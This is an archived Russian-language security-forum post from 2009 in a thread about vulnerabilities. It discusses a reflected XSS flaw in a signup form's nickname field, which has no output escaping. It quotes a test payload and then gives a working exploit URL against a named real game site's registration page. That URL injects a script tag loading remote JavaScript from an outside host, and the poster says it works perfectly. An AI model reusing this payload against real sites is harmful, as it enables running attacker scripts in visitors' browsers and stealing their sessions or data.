Ваши вопросы по уязвимостям.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

26.07.2009, 20:51

JOHNik

Познающий

Регистрация: 21.04.2009

Сообщений: 58

Провел на форуме:
146521

Репутация: 34

Отправить сообщение для JOHNik с помощью ICQ

Цитата:

Сообщение от L I G A

после того как пытаешся зарег-тся под ником
"><script>alert("xss")</script>
скрипт проверяет его длину (от 4 до 20 символов).
если его длина не входит в рамки ограничений то выводит к примеру
ник $_POST['nick'](ему передано значение "><script>alert("xss")</script> и по этому вылазит окно.Там не стоит
htmlspecialchars()) имеет длину больше 20 символов.
>>Из кода ясно что переменная не передаеться не как POST не как GET
данные передаються методом POST

Код HTML:

<form method="POST"

>>И что получаеться это и вовсе не уязвимость ?
уязвимость но с нее в данном случае толку 0

Я вобще тут никакой сложности не вижу

Код:

http://ru.bigpoint.com/signup/?signUp=1&openId=&signUpUsername="><script src=http://www.site.ru/js.js></script>

прекрасно работает!

Похожие темы

Тема

Автор

Раздел

Ответов

Последнее сообщение

Ваши ламерские приколы (Ну когда только комп появился)

PEPSICOLA

Болталка

188

23.05.2010 10:05

Ваши любимые компьютерные игры

PEPSICOLA

Болталка

280

19.08.2009 00:01

Ваши телеги...

F-IFTY

Болталка

18.08.2009 18:22

Вопросы по Ipb 2.0

Voodoo_People

Уязвимости CMS / форумов

15.02.2005 22:57